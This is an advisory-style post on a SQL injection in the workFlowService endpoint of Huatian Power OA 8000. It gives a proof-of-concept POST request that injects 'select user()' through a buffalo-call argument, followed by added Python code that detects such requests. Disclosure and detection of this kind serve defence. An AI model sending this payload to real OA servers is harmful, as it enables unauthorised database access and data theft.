Huatian Power OA 8000 version workFlowService SQL injection vulnerability
Vulnerability Description
The workFlowService interface of Huatian Power OA 8000 has a SQL injection vulnerability. Attackers can use it to obtain sensitive information from the database.
Vulnerability Impact
Huatian Power OA 8000 Edition
Network surveying and mapping
Vulnerability reproduction
Product Page
Send the following request packet to verify the vulnerability:
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 、
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>
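For defenders, the request above suggests a simple detection: flag POSTs to the workFlowService path whose buffalo-call body carries a SQL statement in a `<string>` argument. The following is an added example, not code from the original post or from the vendor; the function name, the keyword heuristic and the second and fourth sample requests are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ENDPOINT = "/OAapp/bfapp/buffalo/workFlowService"  # path taken from the request above
# Heuristic (assumption): a <string> argument that begins like a SQL statement.
SQL_START = re.compile(
    r"^\s*(select|insert|update|delete|union|exec|declare|drop|alter|create)\b", re.I)

def inspect_request(http_method, path, body):
    """Return a reason string if the request looks like SQL sent to workFlowService, else None."""
    if http_method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != ENDPOINT:
        return None
    # Refuse DTDs before parsing so the detector itself is not exposed to entity expansion.
    upper = body.upper()
    if "<!DOCTYPE" in upper or "<!ENTITY" in upper:
        return "DTD/entity declaration in buffalo-call body"
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "malformed buffalo-call body"
    if root.tag != "buffalo-call":
        return None
    method = (root.findtext("method") or "").strip() or "unknown method"
    for arg in root.iter("string"):
        if SQL_START.search(arg.text or ""):
            return f"SQL statement in <string> argument of {method}"
    return None

# Sample requests: the first body is the one shown above, the rest are constructed.
SAMPLES = [
    ("POST", ENDPOINT, "<buffalo-call>\n<method>getDataListForTree</method>\n"
                       "<string>select user()</string>\n</buffalo-call>"),
    ("POST", ENDPOINT, "<buffalo-call><method>getDataListForTree</method>"
                       "<string>dept-42</string></buffalo-call>"),
    ("GET", "/index.jsp", ""),
    ("POST", ENDPOINT, '<!DOCTYPE x [<!ENTITY a "b">]><buffalo-call/>'),
]

if __name__ == "__main__":
    for http_method, path, body in SAMPLES:
        print(http_method, path, "->", inspect_request(http_method, path, body))
```

A match here is an alerting signal only; restricting access to the workFlowService path at the reverse proxy is the stronger control until the interface itself stops accepting SQL text.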
This post is licensed under CC BY 4.0 by the author.